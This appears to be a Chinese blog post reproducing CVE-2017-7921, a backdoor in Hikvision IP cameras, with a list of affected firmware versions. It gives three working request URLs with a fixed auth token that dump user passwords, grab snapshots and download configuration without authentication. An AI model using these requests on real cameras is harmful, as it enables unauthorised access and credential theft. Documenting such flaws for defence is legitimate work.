首页 > 其他分享 >CVE-2017-7921 漏洞复现

CVE-2017-7921 漏洞复现

时间:2022-11-10 21:47:48浏览次数:68  
标签:7921 Series V5.4 漏洞 build V5.2 2017 CVE Build

声明

本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

 

一、漏洞介绍

1.许多Hikvision IP相机包含一个后门,允许未经身份验证假冒任何配置用户帐户。至少从2014年起,海康威视的产品就存在这一漏洞。除了hikvision品牌的设备外,它还影响了许多以各种品牌名称出售的白标相机产品。成千上万的易受攻击的设备在发布时仍暴露在互联网上。除了获得完全的管理访问权限外,该漏洞还可用于检索所有配置用户的明文密码。

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2.在没有身份验证的情况下获取相机快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下载相机配置

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

三、漏洞影响版本

DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106

四、参考链接

https://packetstormsecurity.com/files/144097/hikvisionip-bypass.txt

https://www.seebug.org/vuldb/ssvid-96469

 

欢迎师傅加入QQ交流群1026579707

 

 

标签:7921,Series,V5.4,漏洞,build,V5.2,2017,CVE,Build
From: https://www.cnblogs.com/sentouceshi/p/16878881.html

相关文章

  • win10+VS2017+OSG3.6.4+OSGEarth2.10.2
    谨记:配完环境变量后最好重启一下电脑再测试,否则可能发生运行找不到dll报错的问题。 cmake3.15.6:https://cmake.org/files/v3.15/cmake-3.15.6-win64-x64.msi【until:2......
  • VS+Qt - Visual Studio2017+Qt5.14安装配置教程
    转载自:https://zhuanlan.zhihu.com/p/351084915简介1、VisualStudio是一个集成开发IDE:集成开发环境(IDE,IntegratedDevelopmentEnvironment)是用于提供程序开发环境的......
  • Linux 升级sudo到 1.9.12p1,解决漏洞CVE-2022-43995
    一、查看sudo版本sudo-V二、下载最新版本到服务器并解压wgethttps://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz&&tar-zxvfsudo-1.9.12p1.tar.gz三、安装1、执行......
  • 一文读懂 PyTorch 版本 SRGAN训练和测试【CVPR 2017】
    ????声明:作为全网AI领域干货最多的博主之一,❤️不负光阴不负卿❤️????深度学习:#超分重建、一文读懂????超分重建经典网络SRGAN详尽教程????最近更新:2022年2月28......
  • Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
    ApacheCouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。......
  • Nacos 认证绕过漏洞(CVE-2021-29441)
    Nacos认证绕过漏洞(CVE-2021-29441)产生原因:1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。2.开发者原意是用来处理一些服......
  • VS2017 报错: MSB6006,CL.exe 已退出
    说明win8.1+vs2017精简版运行程序时报上述错误。在安装目录中运行cl.exe可以发现报错缺少各种文件。所以应该是dll环境问题。解决方法修复dll环境。我的是在360软件......
  • CVE-2021-44228log4j2RCE
    环境:jdk1.8.0_121,win11.log4j2.14.01.idea新建springbootweb项目并引入依赖idea安装:1.微信公众号软件管家。2.自行百度新建springbootweb项目。自行百度引入如下......
  • 洛谷 P3951 [NOIP2017 提高组] 小凯的疑惑 题解
    LuoguP3951[NOIP2017提高组]小凯的疑惑题解注:设\(A,B\)是两个集合,则\(A\timesB\)表示\(A\)与\(B\)的笛卡儿积(直积)。笛卡儿积的定义为\(S\timesM:=\{(s......
  • 【Azure 环境】Azure 云环境对于OpenSSL 3.x 的严重漏洞(CVE-2022-3602 和 CVE-2022-3
    问题描述引用报告:(OpenSSL3.x曝出严重漏洞: ​​​https://www.ctocio.com/ccnews/37529.html​​ )最近OpenSSL3.x爆出了严重安全漏洞,分别是 CVE-2022-3602和 CVE-202......